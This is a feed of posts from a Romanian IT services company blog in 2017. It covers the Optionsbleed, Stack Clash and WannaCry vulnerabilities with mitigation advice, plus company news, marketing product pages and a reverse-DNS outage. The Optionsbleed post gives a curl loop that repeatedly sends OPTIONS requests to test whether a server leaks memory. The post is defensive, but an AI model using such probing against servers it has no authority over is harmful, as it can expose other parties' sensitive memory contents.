Articolul original, impreuna cu multe alte detalii il puteti accesa aici: https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html

 

Pe scurt, asemanator cu Heartbleed , desi nici pe departe la fel de grav, Optionsbleed permite citirea de bucati aleatorii din memoria serverului dvs, aceasta conducand la potentiale brese de securitate prin gasirea de parole sau alte informatii sensibile.

 

Optionsbleed presupune interogarea unui server Apache prin metoda OPTIONS . Daca se repeta de mai multe ori aceasta operatie si daca serverul este vulnerabil, veti observa ca pe langa raspunsul normal mai strecoara si bucati aleatorii de memorie. Pentru test, rulati:

 

for VAR in `seq 1 100`; do curl -sI -X OPTIONS http://siteulmeu.ro/ | grep -i allow; done | uniq

 

Din testele rulate pana acum, nici un server camscape nu este vulnerabil.

 

Totusi, desi Apache nu a publicat pana acum o versiune oficiala care sa adreseze aceasta vulnerabilitate http://httpd.apache.org/ , avem deja un update pregatit folosind patch-uri Apache din SVN, update care va fi aplicat astazi pe toate serverele aflate in mentenanta noastra.

 

]]>
Oferim solutii IT atat de bune incat clientii sunt fericiti https://www.camscape.ro/compania/blog/oferim-solutii-it-atat-de-bune-incat-clientii-sunt-fericiti Thu, 27 Jul 2017 09:31:40 +0300 Noi, camscape, oferim solutii si servicii IT din 1996. Clientii nostri sunt clienti multumiti si avem diverse testimoniale de la ei.

 

Dar, cateodata, si astazi este acel cateodata, primim cate o felicitare mai frumoasa. Desi nu pot sa dezvalui numele clientului, voi cita testimonialul primit:

 

solutii si servicii IT camscape.ro

 

Sa-ti dea Dumnezeu sanatate! Este perfect, exact ce aveam nevoie.

 

E, asta da client fericit.

 

]]>
Stack Clash : Vulnerabilitate grava Linux https://www.camscape.ro/compania/blog/stack-clash-vulnerabilitate-grava-linux Wed, 21 Jun 2017 10:32:46 +0300 Stack Clash este o noua vulnerabilitate care afecteaza sistemele de operare derivate UNIX, conform unui anunt al Qualys.com : https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash

 

Este vorba despre un bug vechi de 12 ani care permite citirea de memorie fara permisiune. Cu alte cuvinte, exact motivul principal pentru care sistemele de operare UNIX-like (Linux, BSD, Mac IOS) sunt mai sigure decat Microsoft in legatura cu infectarea cu virusi si alt tip de Malware. A existat o vreme in care exact asta facea diferenta, fiecare program cu bucatica lui de memorie, simplu si eficient si scapai de malware. Nu mai este cazul, a venit si randul UNIX.

 

Pericolul este mare: un user cu drepturi limitate poate deveni root. Daca ne gandim ca userul cu drepturi limitate poate fi userul sub care ruleaza serviciul email sau ce web, atunci devine evident ca un simplu site de prezentare cu un bug de securitate poate duce la infectarea intregului server.

 

Solutia este extrem de complicata (vezi aici detalii tehnice: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt ). Astfel, sunt doua solutii:

  • introducerea unui stack guard-page de cel putin 1MB
  • recompilarea tuturor software-urilor instalate cu optiunea -fstack-check

 

Prima varianta este simplu de implementat, se face direct din linia de comanda, fara restart. Dar nu garanteaza, tot ce are facut un eventual atacator este sa treaca mai sus de aceasta limita.

 

A doua varianta, desi garanteaza blocarea vulnerabilitatii, este fie imposibila (daca asteptati dupa pachetele generate de providerul distributiei), fie foarte complicata daca trebuie sa faceti asta de mana.

 

camscape a inceput deja recompilarea tuturor software-urilor implicate printr-un proces semi-automat pentru securizarea serverelor Linux.

 

 

]]>
Microsoft Ransom Malware: WannaCry sau WCry https://www.camscape.ro/compania/blog/microsoft-ransom-malware-wannacry-sau-wcry Sun, 14 May 2017 20:59:43 +0300 Pe 12 Mai 2017, intre 50.000 si 100.000 de calculatoare din toata lumea au fost infectate cu un nou malware de tip Ransom: WannaCry sau WCry, conform cu articolele publicate de Avast https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today si Kaspersky https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/

 

WannaCry ataca orice sistem Microsoft Windows XP, 7, Vista, 8, precum si variantele de server 2003, 2008 si 2012.

 

Atacul se pare ca este directionat catre echipamentele direct conectate la Internet, trimitand pachete special create pentru protocolul SMB1 (file sharing).

 

Microsoft emisese deja un patch in Martie 2017 pentru a acoperi acest tip de exploit, dar in urma aparitiei WannaCry a mers mai departe si ofera update-uri inclusiv pentru variantele Microsoft iesite din suport (Windows XP, Windows 7, Windows 8, Server 2003): https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

 

Eu sunt vulnerabil?

 

Daca va incadrati in categoria sistem de operare Microwsoft Windows XP, 7, Vista, 8 sau Microsoft Server 2003, 2008, 2012, fara update-uri de securitate la zi, fara firewall care sa limiteze accesul pe porturile de file sharing, fara blocarea protocolului SMBv1, direct conectat la Internet sau in retea cu echipamente virusate, atunci DA, sunteti vulnerabil.

 

Ce trebuie sa faceti pentru a va proteja?

 

  • Instalati patch-urile de securitate oferite de Microsoft: pentru versiunile cu suport: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx pentru versiunile iesite din suport: http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
  • Limitati accesul la porturile 138/tcp, 138/udp, 139/tcp, 139/udp si 445/tcp . Acestea sunt folosite pentru file sharing si, evident, nu ar trebui sa fie public accesibile.
  • Dezinstalati suportul pentru SMB1/CIFS (din program and features). Atentie insa, acest protocol este cel folosit in combinatie cu Windows Server 2003 si cu unele variante de Samba deci s-ar putea sa nu doriti asta.

 

Ce trebuie sa faceti pentru a preintampina pe viitor astfel de atacuri?

 

  • Faceti update-uri pentru sistemele de operare Microsoft. Facute bine si la timp va scapa de multe probleme de acest tip. Pentru retele mari, un server local WSUS este singura solutie.
  • Faceti backup. Nu manual si nu pe serverul de langa. Folositi un serviciu de backup in cloud (reclama) care sa va ofere siguranta si automatizare.
  • Activati serviciul de firewall pe orice echipament cu sistem de operare Microsoft.
  • Nu conectati direct la Internet un echipament cu sistem de operare Microsoft. Are un firewall bun, cel putin in versiunile recente, dar va recomandam dublarea lui cu un firewall bazat pe Linux sau un echipament dedicat.

 

]]>
la Karting, v2.0 https://www.camscape.ro/compania/blog/la-karting-v20 Tue, 04 Apr 2017 14:36:02 +0300 Ieri, ne-am gandit sa incepem saptamana in mare viteza. De ce? Pentru ca spre seara ne astepta un ... circuit de viteza. Cel putin din punctul nostru de vedere, pentru ca pentru noi, o intrecere de karting egala cu un circuit de mare viteza.

 

Surpriza a fost o pista in aer liber, cu karturi de mare putere (incalzirea cu 6.5CP iar cursele de calificare si finala cu "monstrii" de 13CP), ceea ce ne-a facut sa savuram cursa la maximum.

 

camscape, karting, team building

pregatiti de adrenalina

 

camscape it services, karting, team building

ture infernale de circuit, iesiri in decor, scartait de roti si rasturnari de situatie

 

 

in sfarsit la standuri

 

camscape it services, karting, team building

cei care au mai reusit sa ajunga :)

 

camscape it services, karting, team building

dar in final ... am iesit cu totii castigatori

]]>
Solutii marketing, generare studii de piata https://www.camscape.ro/compania/blog/solutii-marketing-generare-studii-de-piata Thu, 23 Mar 2017 12:39:10 +0200 Solutii marketing, generare studii de piata (surveys)

Un alt modul pus la dispozitie de platforma de marketing, este cel de generare studii de piata.

Cu ajutorul modulului ‘Online Surveys’ pot fi generate si urmarite rezultatele unui numar nelimitat de studii de piata, online.

 

Solutii marketing, generare studii de piata online

Avantajele generatorului de studii de piata online

- fara costuri ascunse;

- fara limitari sau costuri suplimentare la numarul de survey-uri generate;

- costuri lunare unice;

- accesari concurente ale platformei;

- sistem avansat ACL (Access Control Level)

 

Beneficii

- optiune ‘preview’: previzualizarea studiului de caz;

- posibilitatea setarii perioadei de desfasurare;

- suport ‘redirect URL’ astfel incat dupa completare, respondentul poate fi redirectionat catre o pagina web din internet/pagina interna ‘thankyou’ cu mesaj personalizat;

- posibilitatea resetarii formularului (dupa completare) pentru completari multiple;

- impartirea intrebarilor in grupuri;

- steps display (afisarea etapizata a grupurilor de intrebari);

- validari avansate email si numar de telefon;

- posibilitatea preluarii de fisiere (ex: CV, Avatar, etc.) de la respondenti;

- reguli de screenare (afisarea contextuala a intrebarilor);

- posibilitatea de replicare a studiilor de piata/intrebarilor din cadrul acestuia;

- management facil al intrebarilor (procesare in masa, reordonare, stergere, schimbare categorie/status);

- rapoarte per studiu:

- generale (total sesiuni, completate, status de desfasurare);

- per intrebare (numar completari);

- export sesiuni de completare in format Excel;

- export sesiune individuala de completare in format Word;

- filtrare sesiuni;

- reports2mail: transmitere rapoarte pe email;

- design modern, compatibil cu majoritatea dispozitivelor;

]]>
Solutii marketing, transmitere emailuri comerciale https://www.camscape.ro/compania/blog/solutii-marketing-transmitere-emailuri-comerciale Thu, 23 Mar 2017 10:08:48 +0200 Solutii marketing, transmitere emailuri comerciale

Camscape lanseaza o noua aplicatie dezvoltata in house, o aplicatie care sa vina in ajutorul implementarii strategiilor de marketing in compania dumneavoastra.

Unul din modulele de marketing incluse este cel de Newsletters.

 

Solutii marketing, Newsletters, bulk emailing

Avantajele oferite de platforma noastra

- fara costuri ascunse;

- fara limitari sau costuri suplimentare la numarul de abonati sau numarul de emailuri transmise;

- costuri lunare unice;

- accesari concurente ale platformei;

- sistem avansat ACL (Access Control Level);

Beneficii

- management facil abonati si categorii de abonati;

- import in masa liste de abonati utilizand fisiere csv;

- statistici per abonat: numar de emailuri citite/trimise, numar de bounce-uri;

- pagina de OptIn cu functie de confirmare abonare (Double OptIn) si protectie antispam;

- pagina de Dezabonare;

- creare campanii cu posibilitatea setarii perioadei de desfasurare;

- utilizarea de token-uri in corpul mesajului;

- utilizarea de template-uri de campanie predefinite;

- management template-uri de campanie email;

- management reguli bounce;

- statistici campanie: totaluri, per abonat campanie;


 

]]>
Probleme RIPE si ARIN https://www.camscape.ro/compania/blog/probleme-ripe-si-arin Fri, 17 Mar 2017 12:57:07 +0200 O problema de comunicare intre RIPE ( https://www.ripe.net ) si ARIN ( https://www.arin.net ) a afectat zonele reverse DNS pentru sute de milioane de IP-uri.

 

Potrivit unui anunt facut de RIPE https://www.ripe.net/support/service-announcements/reverse-dns-issue-for-some-delegations-in-the-ripe-ncc-service-region , problema a existat intre 16 Martie 2017 20:00 si 17 Martie 2017 13:00 EEST .

 

Principala manifestare a fost un blocaj al comunicarii prin email catre serverele email care blocheaza pentru lipsa unei inregistrari reverse DNS (inregistrare PTR) comunicatia SMTP.

 

In acest moment, problema este rezolvata de catre RIPE. Exista posibilitatea ca blocajele sa mai existe o scurta perioada. Totusi pentru inregistrari PTR sunt setate deobicei TTL-uri mici.

 

]]>
WiFi vs cablu https://www.camscape.ro/compania/blog/wifi-vs-cablu Tue, 07 Mar 2017 15:23:31 +0200 Cu totii folosim conexiuni wireless si cu totii visam sa avem echipamentele conectate doar prin WiFi. Nu mai vreau cabluri a devenit o expresie des intalnita si de obicei se continua cu De ce merge asa de prost reteaua?

 

Explicatiile le-am gasit intr-un articol pe cat de tehnic, pe atat de interesant. Veti vedea acolo:

  • minciunile din marketingul producatorilor de echipamente WiFi si cum ne putem astepta la un maxim 10% din viteza inscrisa pe echipament
  • metode de a creste stabilitatea (daca nu si viteza)
  • alegem un echipament puternic sau mai multe echipamente mai slabe (WiFi mesh)

 

Enjoy: https://arstechnica.com/information-technology/2017/03/802-eleventy-what-a-deep-dive-into-why-wi-fi-kind-of-sucks/

 

]]>